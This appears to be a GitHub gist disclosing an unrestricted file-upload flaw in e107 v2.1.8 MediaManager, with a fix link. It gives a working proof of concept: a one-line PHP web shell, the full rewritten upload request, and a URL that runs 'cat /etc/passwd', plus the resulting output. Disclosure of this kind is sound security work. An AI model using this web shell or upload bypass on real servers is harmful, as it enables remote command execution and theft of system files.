Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
e107 v2.1.8 MediaManager bypass filetype check

Description

MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.

Reproduce

  1. Login to the admin page (/e107_admin/admin.php) and access MediaManager.

  2. Make a backdoor PHP file named "backdoor.jpg" to bypass JavaScript filter and select it on MediaManeger.

<?php system($_GET['q']) ?>

You can bypass the filetype check because it is filtered by only the extention.

  1. Start upload and rewrite the request body using BurpSuite as follows. On the server side, this file is accepted as a PHP file.
POST /e107/e107_web/js/plupload/upload.php?for=&path= HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2aneEcIB6Abe9JcJ
Cookie: my_cookie=********************
Connection: close
Content-Length: 503

------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="name"

backdoor.php
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: image/jpeg

<?php system($_GET['q']) ?>
------WebKitFormBoundary2aneEcIB6Abe9JcJ--
  1. After importing the uploaded file, the uploaded file is placed in a directory accessible without authentication. Access http://localhost/e107/e107_media/416f4602e3/files/2018-08/backdoor.php?q=cat%20/etc/passwd. The result of OS command execution is displayed.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false

Source Code

https://github.com/e107inc/e107/blob/604cda1f83f60c808067866e89bf93e2797f3ab5/e107_web/js/plupload/plupload.dev.js#L660-L671

Filetype check is processed by a filter on the client side. But, this check can easily be bypassed by rewriting the request.

Reference

https://github.com/e107inc/e107/issues/3352

Solution

https://github.com/e107inc/e107/commit/e5bb5297f68e56537c004cdbb48a30892e9f6f4c

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.